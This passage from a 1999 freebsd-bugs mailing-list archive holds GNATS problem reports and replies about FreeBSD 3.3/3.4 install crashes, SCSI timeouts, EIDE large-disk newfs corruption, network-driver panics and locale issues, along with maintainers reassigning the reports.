ftp://ftp.FreeBSD.org/pub/FreeBSD/releases/i386/ISO-IMAGES/3.4-install.iso: FTP error: fetch: File unavailable (e.g., file not found, no access) >How-To-Repeat: >Fix: chmod 644 /.2/FreeBSD/releases/i386/ISO-IMAGES/3.4-install.iso on ftp.FreeBSD.org ? >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 9:29:46 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 15BD315479; Tue, 21 Dec 1999 09:29:45 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA33914; Tue, 21 Dec 1999 09:29:45 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Tue, 21 Dec 1999 09:29:45 -0800 (PST) From: Message-Id: <199912211729.JAA33914@freefall.freebsd.org> To: nori@tlab.is.uec.ac.jp, phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, phantom@FreeBSD.org Subject: Re: conf/14487: Please Change "/usr/share/skel/dot.login" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Please Change "/usr/share/skel/dot.login" State-Changed-From-To: open->feedback State-Changed-By: phantom State-Changed-When: Tue Dec 21 09:22:21 PST 1999 State-Changed-Why: Fixed in rev 1.14 dot.login in -CURRENT Responsible-Changed-From-To: freebsd-bugs->phantom Responsible-Changed-By: phantom Responsible-Changed-When: Tue Dec 21 09:22:21 PST 1999 Responsible-Changed-Why: I will commit this fix to -STABLE. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 9:36:41 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D8F5C14EB5; Tue, 21 Dec 1999 09:36:39 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA35025; Tue, 21 Dec 1999 09:36:39 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Tue, 21 Dec 1999 09:36:39 -0800 (PST) From: Message-Id: <199912211736.JAA35025@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, peter@FreeBSD.org Subject: Re: misc/9885: BIND 8.1.2 core dumping Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: BIND 8.1.2 core dumping Responsible-Changed-From-To: freebsd-bugs->peter Responsible-Changed-By: phantom Responsible-Changed-When: Tue Dec 21 09:36:02 PST 1999 Responsible-Changed-Why: Peter's area To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 9:44:21 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BB6A6154AA; Tue, 21 Dec 1999 09:44:20 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA36087; Tue, 21 Dec 1999 09:44:20 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Tue, 21 Dec 1999 09:44:20 -0800 (PST) From: Message-Id: <199912211744.JAA36087@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, obrien@FreeBSD.org Subject: Re: misc/14300: MAKEDEV requires /usr to be mounted (for chown(1)) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: MAKEDEV requires /usr to be mounted (for chown(1)) Responsible-Changed-From-To: freebsd-bugs->obrien Responsible-Changed-By: phantom Responsible-Changed-When: Tue Dec 21 09:43:29 PST 1999 Responsible-Changed-Why: David is working on this problem To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 9:49:36 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1B4581537D; Tue, 21 Dec 1999 09:49:35 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA36831; Tue, 21 Dec 1999 09:49:34 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Tue, 21 Dec 1999 09:49:34 -0800 (PST) From: Message-Id: <199912211749.JAA36831@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, phk@FreeBSD.org Subject: Re: misc/6936: sysinstall: install from MS-DOS MO divece Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: sysinstall: install from MS-DOS MO divece Responsible-Changed-From-To: freebsd-bugs->phk Responsible-Changed-By: phantom Responsible-Changed-When: Tue Dec 21 09:48:03 PST 1999 Responsible-Changed-Why: libdisk is phk's baby To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 9:53:29 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0D2F715504; Tue, 21 Dec 1999 09:53:27 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA37530; Tue, 21 Dec 1999 09:53:27 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Tue, 21 Dec 1999 09:53:27 -0800 (PST) From: Message-Id: <199912211753.JAA37530@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, ache@FreeBSD.org Subject: Re: misc/7850: lt_LT.* locale Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: lt_LT.* locale Responsible-Changed-From-To: freebsd-bugs->ache Responsible-Changed-By: phantom Responsible-Changed-When: Tue Dec 21 09:52:47 PST 1999 Responsible-Changed-Why: Over to Mr. Locale To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 9:57:25 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 45FAE15519; Tue, 21 Dec 1999 09:57:18 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA38199; Tue, 21 Dec 1999 09:57:18 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Tue, 21 Dec 1999 09:57:18 -0800 (PST) From: Message-Id: <199912211757.JAA38199@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-doc@FreeBSD.org Subject: Re: misc/7873: poor initial configuration and documentation of kernel resources frustrating! Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: poor initial configuration and documentation of kernel resources frustrating! Responsible-Changed-From-To: freebsd-bugs->freebsd-doc Responsible-Changed-By: phantom Responsible-Changed-When: Tue Dec 21 09:55:54 PST 1999 Responsible-Changed-Why: Looks like lack of documentation problem To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 10: 8: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B56CE154DC; Tue, 21 Dec 1999 10:08:03 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA40282; Tue, 21 Dec 1999 10:08:03 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Tue, 21 Dec 1999 10:08:03 -0800 (PST) From: Message-Id: <199912211808.KAA40282@freefall.freebsd.org> To: k@numeri.campus.luth.se, phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/11383: $Id$ missing in some files in etc [PATCH] Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: $Id$ missing in some files in etc [PATCH] State-Changed-From-To: open->closed State-Changed-By: phantom State-Changed-When: Tue Dec 21 10:07:43 PST 1999 State-Changed-Why: Problem is obsolete. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 10:10:24 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BD3DB15511 for ; Tue, 21 Dec 1999 10:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA40482; Tue, 21 Dec 1999 10:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from gracie.lbl.gov (gracie.lbl.gov [131.243.2.175]) by hub.freebsd.org (Postfix) with ESMTP id F07AC155A5 for ; Tue, 21 Dec 1999 10:00:09 -0800 (PST) (envelope-from jin@gracie.lbl.gov) Received: (from jin@localhost) by gracie.lbl.gov (8.9.3/8.9.3) id KAA00633; Tue, 21 Dec 1999 10:00:09 -0800 (PST) (envelope-from jin) Message-Id: <199912211800.KAA00633@gracie.lbl.gov> Date: Tue, 21 Dec 1999 10:00:09 -0800 (PST) From: Jin Guojun (FTG staff) Reply-To: j_guojun@lbl.gov To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: misc/15610: 3.4-RELEASE installation hang on aic0 SCSI -- timeout Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15610 >Category: misc >Synopsis: 3.4-RELEASE installation hang on aic0 SCSI -- timeout >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 10:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Jin Guojun (FTG staff) >Release: FreeBSD 3.4-RELEASE i386 >Organization: >Environment: 3.4-RELEASE installation floppies Hardware info.: (Current run 3.3-RELEASE) ASUS P2B-F with P-III 500 NCR (Symbios) 875 SCSI controller Seagate ST15320N disk drive HP C1533A dat tape drive 3.3-RELEASE boot output Waiting 15 seconds for SCSI devices to settle sa0 at ncr0 bus 0 target 3 lun 0 sa0: Removable Sequential Access SCSI-2 device sa0: 10.000MB/s transfers (10.000MHz, offset 8) da0 at ncr0 bus 0 target 1 lun 0 da0: Fixed Direct Access SCSI-2 device da0: 10.000MB/s transfers (10.000MHz, offset 8), Tagged Queueing Enabled da0: 4095MB (8386733 512 byte sectors: 255H 63S/T 522C) >Description: 3.4-RELEASE installation output Waiting 15 seconds for SCSI devices to settle (ptobe15:aic0:0:0:0): ccb 0xc0d03e00 -- Tiem Out, phase 0x0, state 1 (ptobe15:aic0:0:0:0): ccb 0xc0d03e00 -- Tiem Out, phase 0x0, state 1 (ptobe15:aic0:0:0:0): ccb 0xc0d03e00 -- Tiem Out, phase 0x0, state 1 (ptobe15:aic0:0:0:0): ccb 0xc0d03e00 -- Tiem Out, phase 0x0, state 1 ... >How-To-Repeat: happened to above hardwares. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 11:40: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6F5E715506 for ; Tue, 21 Dec 1999 11:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA48995; Tue, 21 Dec 1999 11:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id A786B154E2; Tue, 21 Dec 1999 11:36:30 -0800 (PST) Message-Id: <19991221193630.A786B154E2@hub.freebsd.org> Date: Tue, 21 Dec 1999 11:36:30 -0800 (PST) From: rjbubon@bigi.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/15611: EIDE Large Disk Support, Newfs problem, File system corruption,IBM-DPTA-353750 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15611 >Category: kern >Synopsis: EIDE Large Disk Support, Newfs problem, File system corruption,IBM-DPTA-353750 >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 11:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Robert Bubon >Release: FreeBSD 3.3 >Organization: >Environment: FreeBSD nomad.bigi.com 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Fri Oct 8 16:00:06 MDT 1999 root@nomad.bigi.com:/usr/src/sys/compile/NOMAD i386 >Description: 1) Using whole disk as one filesystems. Newfs exits with the following: 72548384, 72613920, 72679456, 72744992, 72810528, 72876064, 72941600, 73007136, 73072672, 73138208, 73203744, write error: 0 newfs: wtfs: Read-only file system I have been fighting this problem for a while. I even RMA'd the drive. With first drive the newfs would panic the system. I have ran IBM's diagnostics, low-level formated and verified the drive. If I split the drive down the middle, 2 partitions, Strange things happen. I can load the first partition down with data. If I start writing to the 2nd partition, I corrupt the first. It's like the sector indexing in the OS is broke at some large number. Maybe an overflow. BTW I have a IBM 16.5 Gig Drive on the same system, It works fine. nomad# disklabel -r /dev/wd1 # /dev/wd1: type: ESDI disk: wd1s1 label: flags: bytes/sector: 512 sectors/track: 63 tracks/cylinder: 80 sectors/cylinder: 5040 cylinders: 14536 sectors/unit: 73261440 rpm: 3600 interleave: 1 trackskew: 0 cylinderskew: 0 headswitch: 0 # milliseconds track-to-track seek: 0 # milliseconds drivedata: 0 8 partitions: # size offset fstype [fsize bsize bps/cpg] c: 73261440 0 unused 0 0 # (Cyl. 0 - 14535) e: 36630720 0 4.2BSD 1024 8192 16 # (Cyl. 0 - 7267) f: 36630720 36630720 4.2BSD 1024 8192 16 # (Cyl. 7268 - 14535) >How-To-Repeat: Newfs a really large eide drive >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 12: 0: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id ABEB1154E2 for ; Tue, 21 Dec 1999 12:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA50744; Tue, 21 Dec 1999 12:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 21 Dec 1999 12:00:01 -0800 (PST) Message-Id: <199912212000.MAA50744@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Terry Kennedy Subject: Re: kern/10872: Panic in soreceive() due to NULL mbuf pointer Reply-To: Terry Kennedy Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/10872; it has been noted by GNATS. From: Terry Kennedy To: freebsd-gnats-submit@freebsd.org, bob@pmr.com Cc: Subject: Re: kern/10872: Panic in soreceive() due to NULL mbuf pointer Date: Tue, 21 Dec 1999 14:42:29 -0500 (EST) > What would be interesting to find out is if you can still reproduce > it on -CURRENT and 3.3-STABLE. This time, I would ask for you to try > printing out the value of the mmbfree mbuf pointer as well as the mclfree > mcluster pointer from the debugger. Also, if you ever end up crashing > somewhere else (besides for in soreceive or sbdrop), e.g. somewhere > directly from the if_fxp code, or if something has significantly changed > from the first two traces that you provided, if you could get a new trace > and post that along as well. I have a news server (Diablo) that moves about .3TB/day. After being down (due to an unrelated problem) for about 4 hours, I am getting these panics pretty much continuously (about 1 every 5 minutes) now. The FreeBSD version is 3.3-RELEASE from the WC CDROM. I'm using an NCR 875 controller and a DEC 21140 Ethernet chip on a full- duplex 100Mbit segment. NMBCLUSTERS is 32768 due to an earlier problem with running out of mbufs with maxusers=256. Most of the panics are the sbdrop panic, but some of them are a trap 12 in tulip_rx_intr(). Unfortunately, my kernel wasn't config'd with -g. I'm building a new one now and will report back with any additional info I come up with. If any of the developers would find access to the box to be helpful and can respond rapidly, I'd be glad to give them access. But once it gets caught up, it will likely stop crashing. Terry Kennedy http://www.tmk.com terry@tmk.com Jersey City, NJ USA +1 201 451 4554 (voice) +1 201 451 0900 (FAX) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 12:20: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0347D1551F for ; Tue, 21 Dec 1999 12:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA52396; Tue, 21 Dec 1999 12:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 21 Dec 1999 12:20:01 -0800 (PST) Message-Id: <199912212020.MAA52396@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ian Dowse Subject: Re: kern/15611: EIDE Large Disk Support, Newfs problem, File system corruption,IBM-DPTA-353750 Reply-To: Ian Dowse Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15611; it has been noted by GNATS. From: Ian Dowse To: rjbubon@bigi.com Cc: freebsd-gnats-submit@freebsd.org, iedowse@maths.tcd.ie Subject: Re: kern/15611: EIDE Large Disk Support, Newfs problem, File system corruption,IBM-DPTA-353750 Date: Tue, 21 Dec 1999 20:12:03 +0000 In message <19991221193630.A786B154E2@hub.freebsd.org>, rjbubon@bigi.com writes : >1) Using whole disk as one filesystems. Newfs exits with the following: > > 72548384, 72613920, 72679456, 72744992, 72810528, 72876064, 72941600, 7300713 >6, 73072672, 73138208, > 73203744, >write error: 0 >newfs: wtfs: Read-only file system Try turning on LBA mode by or'ing 0x1000 into the flags for wdc0. e.g. in your kernel config file use: controller wdc0 at isa? port "IO_WD1" bio irq 14 flags 0xb0ffb0ff or alternatively in /boot/kernel.rc, add: flags wdc0 0xb0ffb0ff We have been using an IBM 36Gb disk like this (one filesystem covering the whole disk) without any problems. We're using 3.4, but I know that it worked at least as far back as 3.2. The dmesg output gives: wdc0 at 0x1f0-0x1f7 irq 14 flags 0xb0ffb0ff on isa ... wdc0: unit 1 (wd1): , LBA, DMA, 32-bit, multi-block-16 wd1: 35772MB (73261440 sectors), 4560 cyls, 255 heads, 63 S/T, 512 B/S Ian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 12:20: 8 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 66335155B3 for ; Tue, 21 Dec 1999 12:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA52405; Tue, 21 Dec 1999 12:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 69D8E1551A; Tue, 21 Dec 1999 12:13:55 -0800 (PST) Message-Id: <19991221201355.69D8E1551A@hub.freebsd.org> Date: Tue, 21 Dec 1999 12:13:55 -0800 (PST) From: drew0054@tc.umn.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: conf/15612: Re-Scan devices in 3.4-Release options menu of floppies screws formating Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15612 >Category: conf >Synopsis: Re-Scan devices in 3.4-Release options menu of floppies screws formating >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 12:20:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Zachary Drew >Release: 3.4-Release >Organization: unemployed >Environment: Pre-install >Description: When you choose to Re-Scan devices in the options editor the formating gets messed up. No serious but quite ugly. >How-To-Repeat: Choose to Re-Scan devices in options menu of 3.4-Release floppies >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 12:40: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8BBAC14F80 for ; Tue, 21 Dec 1999 12:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA54103; Tue, 21 Dec 1999 12:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 21 Dec 1999 12:40:03 -0800 (PST) Message-Id: <199912212040.MAA54103@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Terry Kennedy Subject: Re: misc/13995: Full duplex mode doesn't work right with de0 driver DEC/Intel DC21x4x (``Tulip'') Reply-To: Terry Kennedy Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR misc/13995; it has been noted by GNATS. From: Terry Kennedy To: freebsd-gnats-submit@freebsd.org, root@kodiak.sdsmt.edu Cc: Subject: Re: misc/13995: Full duplex mode doesn't work right with de0 driver DEC/Intel DC21x4x (``Tulip'') Date: Tue, 21 Dec 1999 15:33:01 -0500 This problem (at least on 3.3-RELEASE) only happens with the newer 21143-based parts (DE500-BA) and not on the 21140 parts (DE500-XA and -AA). Terry Kennedy http://www.tmk.com terry@tmk.com Jersey City, NJ USA +1 201 451 4554 (voice) +1 201 451 0900 (FAX) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 13: 7:25 1999 Delivered-To: freebsd-bugs@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 542) id DAE7214FDA; Tue, 21 Dec 1999 13:07:23 -0800 (PST) Date: Tue, 21 Dec 1999 13:07:23 -0800 From: "Andrey A. Chernov" To: phantom@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org Subject: Re: misc/14999: ISO8859-5 locale missing from RELENG_3 Message-ID: <19991221130723.A62017@freebsd.org> References: <199912201548.HAA24659@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <199912201548.HAA24659@freefall.freebsd.org>; from phantom@FreeBSD.org on Mon, Dec 20, 1999 at 07:48:58AM -0800 Organization: Biomechanoid Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Dec 20, 1999 at 07:48:58AM -0800, phantom@FreeBSD.org wrote: > Synopsis: ISO8859-5 locale missing from RELENG_3 > > Responsible-Changed-From-To: freebsd-bugs->ache > Responsible-Changed-By: phantom > Responsible-Changed-When: Mon Dec 20 07:48:16 PST 1999 > Responsible-Changed-Why: > Over to Mr. Locale I can't - I don't have 3.* for testing. -- Andrey A. Chernov http://nagual.pp.ru/~ache/ MTH/SH/HE S-- W-- N+ PEC>+ D A a++ C G>+ QH+(++) 666+>++ Y To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 14:30: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5CDE615526 for ; Tue, 21 Dec 1999 14:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA63888; Tue, 21 Dec 1999 14:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 4FC8E14DCE; Tue, 21 Dec 1999 14:28:12 -0800 (PST) Message-Id: <19991221222812.4FC8E14DCE@hub.freebsd.org> Date: Tue, 21 Dec 1999 14:28:12 -0800 (PST) From: kehlet@techfuel.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/15615: 3.4 install program segfaults when you select "Custom" under Distributions Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15615 >Category: misc >Synopsis: 3.4 install program segfaults when you select "Custom" under Distributions >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 14:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Steven Kehlet >Release: 3.4-RELEASE >Organization: Techfuel, Inc. >Environment: NA >Description: The install program crashes when you select "Custom" under Distributions. >How-To-Repeat: "Begin a custom installation" (select partition space for FBSD) (label the partition) "Select distributions to extract" Select "Custom" Crash: "A signal 11 was caught..." I enabled debugging but all it shows is: "DEBUG: Signal 11 caught! That's bad!" >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 15:20: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C423814CED for ; Tue, 21 Dec 1999 15:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA67432; Tue, 21 Dec 1999 15:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 21 Dec 1999 15:20:02 -0800 (PST) Message-Id: <199912212320.PAA67432@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Jin Guojun (FTG staff) Subject: Re: misc/15610: 3.4-RELEASE installation hang on aic0 SCSI -- timeout Reply-To: Jin Guojun (FTG staff) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR misc/15610; it has been noted by GNATS. From: Jin Guojun (FTG staff) To: FreeBSD-gnats-submit@FreeBSD.ORG Cc: Subject: Re: misc/15610: 3.4-RELEASE installation hang on aic0 SCSI -- timeout Date: Tue, 21 Dec 1999 15:14:05 -0800 (PST) More information on this installation. After disbale aic, the installation will continue to the installation menu. Everything can be set up correctly, but immediately panic whenever the installing procedure starts. The installation reboots the machine :-( -Jin > >Number: 15610 > >Category: misc > >Synopsis: 3.4-RELEASE installation hang on aic0 SCSI -- timeout > >Confidential: no > >Severity: serious > >Priority: high > >Responsible: freebsd-bugs > >State: open > >Quarter: > >Keywords: > >Date-Required: > >Class: sw-bug > >Submitter-Id: current-users > >Arrival-Date: Tue Dec 21 10:10:01 PST 1999 > >Closed-Date: > >Last-Modified: > >Originator: Jin Guojun (FTG staff) > >Release: FreeBSD 3.4-RELEASE i386 > >Organization: > >Environment: > > 3.4-RELEASE installation floppies > Hardware info.: (Current run 3.3-RELEASE) > ASUS P2B-F with P-III 500 > NCR (Symbios) 875 SCSI controller > Seagate ST15320N disk drive > HP C1533A dat tape drive > > 3.3-RELEASE boot output > Waiting 15 seconds for SCSI devices to settle > sa0 at ncr0 bus 0 target 3 lun 0 > sa0: Removable Sequential Access SCSI-2 device > sa0: 10.000MB/s transfers (10.000MHz, offset 8) > da0 at ncr0 bus 0 target 1 lun 0 > da0: Fixed Direct Access SCSI-2 device > da0: 10.000MB/s transfers (10.000MHz, offset 8), Tagged Queueing Enabled > da0: 4095MB (8386733 512 byte sectors: 255H 63S/T 522C) > > > >Description: > > 3.4-RELEASE installation output > Waiting 15 seconds for SCSI devices to settle > (ptobe15:aic0:0:0:0): ccb 0xc0d03e00 -- Tiem Out, phase 0x0, state 1 > (ptobe15:aic0:0:0:0): ccb 0xc0d03e00 -- Tiem Out, phase 0x0, state 1 > (ptobe15:aic0:0:0:0): ccb 0xc0d03e00 -- Tiem Out, phase 0x0, state 1 > (ptobe15:aic0:0:0:0): ccb 0xc0d03e00 -- Tiem Out, phase 0x0, state 1 